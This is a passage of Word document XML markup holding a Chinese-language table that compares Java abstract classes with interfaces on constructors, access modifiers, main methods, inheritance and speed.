            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>构造器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>抽象类可以有构造器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口不能有构造器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>与正常Java类的区别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>除了你不能实例化抽象类之外，它和普通Java类没有任何区别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口是完全不同的类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>访问修饰符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>抽象方法可以有</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>protected</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>default</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>这些修饰符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口方法默认修饰符是</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>。你不可以使用其它修饰符。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>main方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>抽象方法可以有main方法并且我们可以运行它</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口没有main方法，因此我们不能运行它。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>多继承</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>抽象方法可以继承一个类和实现多个接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口只可以继承一个或多个其它接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00A22876">
        <w:trPr>
          <w:trHeight w:val="1942"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>速度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>它比接口速度要快</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>接口是稍微有点慢的，因为它需要时间去寻找在类中实现的方法。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00884B2B" w:rsidTr="00884B2B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2490" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="54" w:type="dxa"/>
              <w:left w:w="54" w:type="dxa"/>
              <w:bottom w:w="54" w:type="dxa"/>
              <w:right w:w="54" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00884B2B" w:rsidRDefault="00884B2B">
            <w:pPr>
              <w:spacing w:line="226" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
